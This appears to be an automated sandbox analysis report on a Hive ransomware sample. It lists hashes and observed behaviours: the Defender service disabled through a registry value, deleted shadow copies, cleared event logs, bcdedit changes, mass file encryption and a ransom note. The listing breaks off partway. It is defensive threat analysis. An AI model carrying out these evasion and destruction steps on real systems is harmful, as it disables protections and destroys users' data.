Malware Analysis Report

2024-10-16 03:11

Sample ID: 220112-vctrxsdcd4
Target: ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.7z
SHA256: 3637aef5b536218308df14490502af0cd9fd71ae4e75788d23a0940c75328fe9
Tags: hive evasion ransomware spyware stealer trojan
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V6
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score: 10/10
SHA256: 3637aef5b536218308df14490502af0cd9fd71ae4e75788d23a0940c75328fe9
Threat Level: Known bad

The file ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.7z was found to be: Known bad.

Malicious Activity Summary

hive evasion ransomware spyware stealer trojan

Modifies security service

Hive

Deletes Windows Defender Definitions

Modifies Windows Defender Real-time Protection settings

Clears Windows event logs

Deletes shadow copies

Modifies boot configuration data using bcdedit

Modifies extensions of user files

Reads user/profile data of web browsers

Drops file in Program Files directory

Launches sc.exe

Suspicious use of AdjustPrivilegeToken

Interacts with shadow copies

Runs ping.exe

Modifies registry class

Runs net.exe

Opens file in notepad (likely ransom note)

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2022-01-12 16:51

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2022-01-12 16:51
Reported: 2022-01-12 16:56
Platform: win7-en-20211208
Max time kernel: 111s
Max time network: 19s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Hive

ransomware hive

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" C:\Windows\system32\reg.exe N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Modifies extensions of user files

ransomware
Description Indicator Process Target
File renamed C:\Users\Admin\Pictures\RepairEdit.tif => C:\Users\Admin\Pictures\RepairEdit.tif.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_EhNcjUAuLdM0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Users\Admin\Pictures\RepairEdit.tif.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_EhNcjUAuLdM0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\create_stream.html.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_2K-A8LTlW3c0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\COMPASS\COMPASS.ELM.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_HxyKwaAO0kA0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02062U.BMP.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_8Q6E0oc6aSk0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GROOVE_K_COL.HXK.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_3yv4CdwDjBk0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGACCBAR.XML.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_1d5LHCbnaoQ0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationLeft_ButtonGraphic.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\snmp.acl.template.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_5pwCAk2ZeU40.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-host.xml.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_TDi2M248ae40.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.STD.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_mB197x-7ESg0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105398.WMF.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_iqTGUFcF8K40.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02055_.GIF.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_QrECq0XitvE0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\attention.gif.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_UaFo7RFhTW80.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\id.txt.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_7nt2z_fC8G80.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Beirut.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_OIDYItiR9UA0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Windows Media Player\Network Sharing\wmpnss_color120.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Windows Media Player\en-US\WMPMediaSharing.dll.mui C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\System\msadc\de-DE\msdaremr.dll.mui C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\TRANSLAT\FREN\WT61FR.LEX.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_-A5L_yyGy9w0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21320_.GIF.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_73Xpwn8vOXU0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Common Files\System\Ole DB\fr-FR\oledb32r.dll.mui C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\about.html.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_sXWSuGNPlOw0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_TexturedBlue.gif.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_o0gZWWqnMpE0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\olh.htm.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_ZAYgjyLklNI0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.nl_ja_4.4.0.v20140623020002.jar.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_2iBLvPrc1cs0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00525_.WMF.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_QmX4s34Pm_w0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Apex.eftx.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_J92562rVLaA0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\LightSpirit.css.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_IvKtXVYpzBU0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME32.CSS.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX__Juo41fnAak0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR35B.GIF.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_He5v3L7Le2Y0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\javafx-doclet.jar.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_6mmSMYFtRpg0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core_zh_CN.jar.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_kRcKiFTFKdY0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\VSTA\8.0\Microsoft.VisualStudio.Tools.Applications.Blueprints.tlb.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_cxO5c_vZWKQ0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\ED00172_.WMF.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_KMKEoirQ7Kk0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Metro.xml.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_FCW9pEv76SY0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\CONVERT\DELIMDOS.FAE.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_yMZghGXwK0M0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\vintage.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\de-DE\Sidebar.exe.mui C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_nzaHGLv0l7g0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\de-DE\gadget.xml C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\css\settings.css C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\ja-JP\css\RSSFeeds.css C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\17.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152694.WMF.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_6y_JmgaBjcc0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Horizon.xml.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_ohINEspscuA0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\ENV98SP.POC.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_xVSL3MKDwio0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File created C:\Program Files\Java\jre7\lib\zi\Australia\vyS2_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-keyring-impl.jar.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_T_5kpoyHQ4o0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Windows Media Player\Media Renderer\DMR_120.jpg C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107138.WMF.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_LXf1aZUo83k0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10298_.GIF.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_IUEzNwTFoFo0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\CONTACTINFOBB.POC.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_GXJ8f_850rQ0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\RES98.POC.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_gZ_OULBOO1Q0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-multitabs.xml.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_sbwHUebQ9pc0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsColorChart.html.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_Ioa59tnyF6g0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.rcp_4.3.100.v20141007-2301.jar.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_uwITgXmPWSI0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0103850.WMF.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_Tng6RQylyO40.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0106146.WMF.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_8jBlI_xLw680.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107342.WMF.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_wU-hOPd_Trc0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\rtf_pressed.gif.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_Jv4qWcwwWMA0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Windows Media Player\de-DE\wmplayer.exe.mui C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Equity.eftx.ozcQ5SmGnOwN1Mo5fQ25V59C_wCrqXWgl9Kwm8uR3dX_dLxdhNykO340.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Internet Explorer\ie9props.propdesc C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A

Launches sc.exe

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\notepad.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1400 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\net.exe
PID 2036 wrote to memory of 1160 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1400 wrote to memory of 696 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\net.exe
PID 696 wrote to memory of 1224 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1400 wrote to memory of 1252 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\net.exe
PID 1252 wrote to memory of 764 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1400 wrote to memory of 816 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\net.exe
PID 816 wrote to memory of 1544 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1400 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\net.exe
PID 1952 wrote to memory of 740 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1400 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\net.exe
PID 956 wrote to memory of 960 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1400 wrote to memory of 1404 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\net.exe
PID 1404 wrote to memory of 1560 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1400 wrote to memory of 1804 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\net.exe
PID 1804 wrote to memory of 1168 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1400 wrote to memory of 992 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\system32\sc.exe
